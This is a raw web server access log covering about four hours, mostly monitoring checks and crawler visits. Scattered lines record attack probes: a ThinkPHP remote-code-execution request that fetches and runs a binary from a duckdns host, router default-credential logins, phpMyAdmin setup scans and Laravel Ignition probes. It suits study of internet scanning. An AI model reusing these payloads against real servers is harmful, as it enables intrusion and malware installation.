128.14.141.42 - - [02/May/2021:21:14:41 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [02/May/2021:21:15:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:17:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:19:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
92.118.160.13 - - [02/May/2021:21:20:03 +0200] "GET / HTTP/1.1" 200 1155 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
205.185.122.102 - - [02/May/2021:21:20:13 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
195.56.55.225 - - [02/May/2021:21:21:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:23:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:25:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:27:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
207.46.13.70 - - [02/May/2021:21:29:01 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
195.56.55.225 - - [02/May/2021:21:29:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:31:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:33:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:35:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:37:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:39:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:41:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.151.81 - - [02/May/2021:21:41:52 +0200] "GET /ovis/lotorony.html HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [02/May/2021:21:43:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
60.8.123.242 - - [02/May/2021:21:44:34 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "http://blog.sina.cn/dpool/blog/s/blog_4981dcdd01008y28.html" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
110.249.202.167 - - [02/May/2021:21:44:38 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
60.8.123.232 - - [02/May/2021:21:44:39 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
60.8.123.240 - - [02/May/2021:21:44:40 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "http://blog.sina.cn/dpool/blog/s/blog_4981dcdd01008y28.html" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
195.56.55.225 - - [02/May/2021:21:45:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
115.50.147.145 - - [02/May/2021:21:46:06 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 283 "-" "-"
195.56.55.225 - - [02/May/2021:21:47:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
128.14.141.42 - - [02/May/2021:21:49:33 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [02/May/2021:21:50:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:52:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:54:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:21:56:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
176.46.130.91 - - [02/May/2021:21:57:30 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
195.56.55.225 - - [02/May/2021:21:58:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:00:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
178.236.122.86 - - [02/May/2021:22:00:49 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.56.55.225 - - [02/May/2021:22:02:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:04:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:06:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:08:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:10:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.129.205 - - [02/May/2021:22:11:07 +0200] "GET /cikk.php3?id_article=1161 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [02/May/2021:22:12:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:14:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:16:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:18:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.158.146 - - [02/May/2021:22:18:46 +0200] "GET /indy/pga/pages/solidarity.html HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
193.118.53.138 - - [02/May/2021:22:19:41 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [02/May/2021:22:20:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.151.81 - - [02/May/2021:22:22:15 +0200] "GET /maxigas/pick/painting/sime.jpg HTTP/1.1" 404 303 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [02/May/2021:22:22:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:24:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
92.118.160.1 - - [02/May/2021:22:26:34 +0200] "GET / HTTP/1.1" 200 1155 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
193.118.53.138 - - [02/May/2021:22:26:43 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [02/May/2021:22:26:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
193.118.55.146 - - [02/May/2021:22:27:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [02/May/2021:22:29:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
42.118.245.157 - - [02/May/2021:22:29:25 +0200] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://12dx.duckdns.org/86 -O .sshd ; chmod 777 .sshd ; ./.sshd ThinkPHP ; rm -rf .sshd' HTTP/1.1" 400 365 "-" "-"
195.56.55.225 - - [02/May/2021:22:31:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:33:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:35:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:37:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:39:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:41:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:43:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:45:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:47:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:49:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:51:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:53:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:22:55:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.36.149.33 - - [02/May/2021:22:55:56 +0200] "GET /robots.txt HTTP/1.1" 404 290 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
195.56.55.225 - - [02/May/2021:22:57:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
64.227.3.111 - - [02/May/2021:22:58:18 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 299 "http://195.56.55.225:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
195.56.55.225 - - [02/May/2021:22:59:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:01:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:03:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:06:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:08:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
23.90.160.138 - - [02/May/2021:23:08:16 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [02/May/2021:23:10:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:12:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
51.159.16.54 - - [02/May/2021:23:14:03 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 317 "-" "ZmEu"
51.159.16.54 - - [02/May/2021:23:14:03 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 304 "-" "ZmEu"
51.159.16.54 - - [02/May/2021:23:14:03 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "ZmEu"
51.159.16.54 - - [02/May/2021:23:14:03 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 297 "-" "ZmEu"
51.159.16.54 - - [02/May/2021:23:14:05 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 301 "-" "ZmEu"
51.159.16.54 - - [02/May/2021:23:14:06 +0200] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 301 "-" "ZmEu"
195.56.55.225 - - [02/May/2021:23:14:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
162.214.71.141 - - [02/May/2021:23:15:04 +0200] "GET /maxigas/blog/keen4title.gif HTTP/1.1" 404 300 "-" "XenForo/2.x (https://www.satelliteguys.us/xen)"
114.119.132.6 - - [02/May/2021:23:15:17 +0200] "GET /cikk.php3?id_article=38 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
34.77.163.42 - - [02/May/2021:23:16:07 +0200] "GET / HTTP/1.1" 200 1155 "-" "python-requests/2.25.1"
195.56.55.225 - - [02/May/2021:23:16:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:18:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:20:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:22:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
80.99.7.67 - - [02/May/2021:23:24:00 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [02/May/2021:23:24:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:26:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:29:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.156.251 - - [02/May/2021:23:30:52 +0200] "GET /cikk.php3?id_article=171 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [02/May/2021:23:31:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:33:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:35:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:37:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
128.14.209.146 - - [02/May/2021:23:38:02 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [02/May/2021:23:39:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.102.49.193 - - [02/May/2021:23:39:45 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
94.102.49.193 - - [02/May/2021:23:39:46 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "-"
94.102.49.193 - - [02/May/2021:23:39:46 +0200] "GET /sitemap.xml HTTP/1.1" 404 287 "-" "-"
94.102.49.193 - - [02/May/2021:23:39:47 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 300 "-" "-"
94.102.49.193 - - [02/May/2021:23:39:49 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
94.102.49.193 - - [02/May/2021:23:39:55 +0200] "\x03%\x1c\x8f`" 501 - "-" "-"
195.56.55.225 - - [02/May/2021:23:41:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:43:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:45:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:47:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.132.6 - - [02/May/2021:23:48:41 +0200] "GET /ovis/lotorony.html HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [02/May/2021:23:49:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:51:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:53:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:55:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/May/2021:23:57:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
161.35.57.207 - - [02/May/2021:23:58:38 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
161.35.57.207 - - [02/May/2021:23:58:46 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
128.14.209.154 - - [02/May/2021:23:59:21 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [02/May/2021:23:59:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:01:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:03:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:06:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
92.118.160.13 - - [03/May/2021:00:07:55 +0200] "GET / HTTP/1.1" 200 1155 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
195.56.55.225 - - [03/May/2021:00:08:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:10:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
161.35.57.207 - - [03/May/2021:00:10:16 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 302 "-" "python-requests/2.18.4"
195.56.55.225 - - [03/May/2021:00:12:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:14:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
161.35.57.207 - - [03/May/2021:00:14:38 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 302 "-" "python-requests/2.18.4"
66.102.8.105 - - [03/May/2021:00:14:43 +0200] "GET / HTTP/1.1" 200 1155 "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
195.56.55.225 - - [03/May/2021:00:16:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
86.140.73.72 - - [03/May/2021:00:17:20 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [03/May/2021:00:18:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:20:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:22:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
193.118.55.162 - - [03/May/2021:00:23:27 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
138.68.73.41 - - [03/May/2021:00:24:30 +0200] "GET / HTTP/1.1" 200 1155 "-" "curl/7.58.0"
195.56.55.225 - - [03/May/2021:00:24:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.240.192.138 - - [03/May/2021:00:24:33 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.240.192.138 - - [03/May/2021:00:24:35 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "-"
66.240.192.138 - - [03/May/2021:00:24:36 +0200] "GET /sitemap.xml HTTP/1.1" 404 296 "-" "-"
66.240.192.138 - - [03/May/2021:00:24:37 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 309 "-" "-"
66.240.192.138 - - [03/May/2021:00:24:44 +0200] "GET /favicon.ico HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
66.240.192.138 - - [03/May/2021:00:24:53 +0200] "\x03\xb0&\x8f`" 501 - "-" "-"
34.77.163.42 - - [03/May/2021:00:24:55 +0200] "GET / HTTP/1.1" 200 1155 "-" "python-requests/2.25.1"
195.56.55.225 - - [03/May/2021:00:26:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
138.68.73.41 - - [03/May/2021:00:28:32 +0200] "GET / HTTP/1.1" 200 1155 "-" "curl/7.58.0"
195.56.55.225 - - [03/May/2021:00:28:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.102.49.193 - - [03/May/2021:00:28:40 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
94.102.49.193 - - [03/May/2021:00:28:43 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "-"
94.102.49.193 - - [03/May/2021:00:28:43 +0200] "GET /sitemap.xml HTTP/1.1" 404 287 "-" "-"
94.102.49.193 - - [03/May/2021:00:28:43 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 300 "-" "-"
94.102.49.193 - - [03/May/2021:00:28:44 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
94.102.49.193 - - [03/May/2021:00:28:49 +0200] "\x03\x9d'\x8f`" 501 - "-" "-"
195.56.55.225 - - [03/May/2021:00:30:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:32:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
92.118.160.13 - - [03/May/2021:00:33:24 +0200] "GET / HTTP/1.1" 200 1155 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
89.248.170.22 - - [03/May/2021:00:33:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
162.214.71.141 - - [03/May/2021:00:34:38 +0200] "GET /maxigas/blog/keen4title.gif HTTP/1.1" 404 300 "-" "XenForo/2.x (https://www.satelliteguys.us/xen)"
114.119.129.205 - - [03/May/2021:00:34:44 +0200] "GET /gal/okofeszt/pages/20050416%20053.htm HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [03/May/2021:00:34:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:36:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.248.170.22 - - [03/May/2021:00:38:18 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
195.56.55.225 - - [03/May/2021:00:38:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:40:57 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:43:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:45:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:47:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
154.57.3.99 - - [03/May/2021:00:48:53 +0200] "GET /user HTTP/1.1" 404 292 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:70.0) Gecko/20100101 Firefox/70.0"
154.57.3.99 - - [03/May/2021:00:48:54 +0200] "GET /user HTTP/1.1" 404 292 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:70.0) Gecko/20100101 Firefox/70.0"
54.36.148.209 - - [03/May/2021:00:49:08 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
195.56.55.225 - - [03/May/2021:00:49:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:51:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:53:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:55:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:57:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:00:59:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:01:01:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
80.91.116.209 - - [03/May/2021:01:03:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.56.55.225 - - [03/May/2021:01:03:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:01:05:35 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:01:07:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
34.77.163.42 - - [03/May/2021:01:08:05 +0200] "GET / HTTP/1.1" 200 1155 "-" "python-requests/2.25.1"
195.56.55.225 - - [03/May/2021:01:09:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:01:11:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
